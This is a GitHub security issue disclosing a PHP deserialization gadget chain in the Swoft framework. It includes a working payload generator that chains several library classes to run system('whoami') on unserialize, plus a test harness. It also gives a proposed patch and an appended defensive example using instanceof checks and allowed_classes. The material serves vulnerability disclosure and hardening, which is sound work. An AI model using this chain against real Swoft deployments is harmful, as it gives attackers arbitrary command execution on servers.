
A gadget chain of the deserialization vulnerability in latest Swoft #1506

Open
CyanM0un opened this issue Sep 1, 2023 · 0 comments
swoft: db Issues for swoft db component swoft: event

Comments


CyanM0un commented Sep 1, 2023

Q: Security report?
A: yes

Details
The website swoft.io doesn't work so I report the gadget chain here, which could lead to RCE when deserializing untrusted data. The testing files are listed below:

<?php
// payload.php
// Builds the serialized object graph for the chain. Every class below is a
// stub that carries only the properties the chain needs; on the target the
// real classes are resolved by Composer's autoloader when the data is
// unserialized.
namespace Swoft\Session
{
    class SwooleStorage
    {
        // First link: $db holds the HttpSession object.
        private $db;

        function __construct($function, $parameter)
        {
            $this->db = new \Swoft\Http\Session\HttpSession($function, $parameter);
        }
    }
}

namespace Swoft\Http\Session
{
    class HttpSession
    {
        // HttpSession::destroy() calls $this->handler->destroy($this->sessionId)
        // (see Advice below); here $handler is a Style object instead of a
        // real session handler.
        private $handler;
        private $sessionId;

        function __construct($function, $parameter)
        {
            $this->sessionId = 'x';
            $this->handler = new \Swoft\Console\Style\Style($function, $parameter);
        }
    }
}

namespace Swoft\Console\Style
{
    class Style
    {
        // $styles is replaced by a DotenvVariables object.
        private $styles;

        function __construct($function, $parameter)
        {
            $this->styles = new \Dotenv\Environment\DotenvVariables($function, $parameter);
        }
    }
}

namespace Dotenv\Environment
{
    class DotenvVariables
    {
        // $adapters is replaced by a LazyOption object.
        protected $adapters;

        function __construct($function, $parameter)
        {
            $this->adapters = new \PhpOption\LazyOption($function, $parameter);
        }
    }
}

namespace PhpOption
{
    class LazyOption
    {
        // Terminal gadget: LazyOption invokes $callback with $arguments,
        // here system('whoami').
        private $callback;
        private $arguments;

        function __construct($function, $parameter)
        {
            $this->callback = $function;
            $this->arguments = [$parameter];
        }
    }
}

namespace
{
    // URL-encoded so the payload can be passed through a query string or CLI argument.
    echo urlencode(serialize(new \Swoft\Session\SwooleStorage("system", "whoami")));
}

<?php
// index.php in Swoft directory
include_once __DIR__ . "/vendor/autoload.php";
// $poc is the URL-encoded output of payload.php; reading it from the first
// command-line argument is an assumption added to make the file runnable.
$poc = $argv[1] ?? '';
unserialize(urldecode($poc));

Advice
I am wondering whether adding the patch below to class Swoft\Http\Session\HttpSession may help prevent the gadget chain execution:

public function destroy(): bool
{
    $this->data   = [];
    $this->closed = true;
    if (!method_exists($this->handler, 'destroy')) {
        die();
    }
    return $this->handler->destroy($this->sessionId);
}
@github-actions github-actions bot added the swoft: db Issues for swoft db component label Sep 1, 2023
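The proposed `method_exists()` guard stops this particular chain because the forwarding happens through `__call()`, which `method_exists()` does not see, but it only hardens one link and kills the worker with `die()`. The example below (added here; it is not Swoft's code and uses stand-in classes `SessionLike`, `CallableForwarder` and `HandlerLike`, all hypothetical) shows the two checks a practitioner would combine: an `instanceof` check against the expected handler interface at the call site, and `allowed_classes` on the `unserialize()` sink so that unexpected classes arrive as `__PHP_Incomplete_Class` and never get their magic methods invoked. The serialized input is constructed inline.

```php
<?php
declare(strict_types=1);

// Interface a legitimate session handler is expected to implement (assumed name).
interface HandlerLike
{
    public function destroy(string $id): bool;
}

// Records whether the "dangerous" callback was ever invoked.
function markExecuted(string $arg): bool
{
    $GLOBALS['executed'] = $arg;
    return true;
}

// Stand-in for the terminal gadget: any object whose __call() ends in
// call_user_func_array(). Not PhpOption\LazyOption; same shape only.
final class CallableForwarder
{
    public function __construct(private string $callback, private array $arguments) {}

    public function __call(string $name, array $args): mixed
    {
        return call_user_func_array($this->callback, $this->arguments);
    }
}

// Stand-in for HttpSession: $handler comes from untrusted serialized data.
final class SessionLike
{
    public function __construct(private object $handler, private string $sessionId = 'x') {}

    // Hardened destroy(): refuse any handler that is not the expected interface.
    // Unlike die(), an exception lets the caller log and fail the request only.
    public function destroy(): bool
    {
        if (!$this->handler instanceof HandlerLike) {
            throw new UnexpectedValueException('unexpected handler class ' . get_class($this->handler));
        }
        return $this->handler->destroy($this->sessionId);
    }
}

// Sink hardening: only the listed classes may be instantiated; everything else
// becomes __PHP_Incomplete_Class, so no __wakeup/__destruct/__call can fire.
function safeUnserialize(string $data, array $allowedClasses): mixed
{
    $value = unserialize($data, ['allowed_classes' => $allowedClasses]);
    if ($value instanceof __PHP_Incomplete_Class) {
        throw new UnexpectedValueException('refusing object of non-whitelisted class');
    }
    return $value;
}

// Constructed payload: a SessionLike whose handler is a forwarder.
$payload = serialize(new SessionLike(new CallableForwarder('markExecuted', ['pwned'])));
$GLOBALS['executed'] = null;

// 1. Unrestricted unserialize + naive destroy(): the forwarder's __call runs the callback.
$naive = unserialize($payload);
try {
    $naive->destroy();
} catch (UnexpectedValueException $e) {
    echo "instanceof guard blocked the call: {$e->getMessage()}\n";
}
echo 'callback executed: ' . var_export($GLOBALS['executed'], true) . "\n";

// 2. Whitelisted unserialize: only SessionLike is allowed, so the nested
//    CallableForwarder is an incomplete class and destroy() rejects it.
$restricted = unserialize($payload, ['allowed_classes' => [SessionLike::class]]);
try {
    $restricted->destroy();
} catch (UnexpectedValueException $e) {
    echo "whitelist + guard blocked the call: {$e->getMessage()}\n";
}

// 3. Top-level class not whitelisted at all: rejected before any method is called.
try {
    safeUnserialize($payload, [HandlerLike::class]);
} catch (UnexpectedValueException $e) {
    echo "sink rejected payload: {$e->getMessage()}\n";
}
```

Note that `method_exists($obj, 'destroy')` already returns false for a `__call()`-backed forwarder, so the issue's patch does break this chain; the `instanceof` form makes the intent explicit and also rejects objects that happen to define a real `destroy()` for some other purpose. The `allowed_classes` option is the only measure that protects every link at once, and it belongs wherever Swoft calls `unserialize()` on data an attacker can influence.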